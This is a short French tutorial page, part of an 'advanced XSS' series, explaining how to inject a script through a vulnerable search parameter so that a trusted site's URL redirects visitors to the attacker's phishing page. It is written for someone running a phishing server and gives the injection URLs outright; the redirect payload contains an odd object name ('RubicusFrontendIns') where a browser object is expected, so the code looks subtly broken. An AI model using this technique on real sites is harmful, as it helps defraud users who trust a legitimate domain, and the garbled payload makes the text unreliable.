Accueil - Tutoriaux - XSS Avancée - Exploitation pour du phishing

Exploitation pour du phishing

Cette technique est moins connue que sa petite soeur mais peut faire de gros dégâts si elle est bien exploitée.

Soit un serveur (le votre) fait pour du phishing, et imaginons que vous n'ayez pas de nom de domaine et que vous voulez garder votre fric pour une utilisation autre.

Et bien ce type d'exploitation est ce qu'il vous faut.

Elle part d'une simple constatation, combien d'utilisateurs font attention à l'URL du site indiqué (ou mieux formulée : des détails de l'URL du site qu'ils visitent).

Donc pour la plupart des utilisateurs du net c'est aussi normal de voir ça :

https://www.lespetitsnounours.fr/search.php?mc=< script >alert("test xss") ; < /script >

que ça :

https://www.lespetitsnounours.fr/index.php

Si vous voyez ce que je veux dire vous devez sûrement avoir compris, que pour ce type d'exploitation on utilise une redirection au lieu d'une alerte.

D'où :

https://www.lespetitsnounours.fr/search.php?mc=< script > RubicusFrontendIns.location.href = "https://monsitemalveillant/pagephishing.php" ; < /script >

Donc le mec se fait phisher sans le savoir. C'est une technique beaucoup plus subtile que l'utilisation d'un nom de domaine proche qui fait parfois pitié :

https://www.lesptitsnounors.herbergeurgratuit.com/

(ou autre ...)

Contact

unn@med

Voir "Contact" Pour m'envoyer un email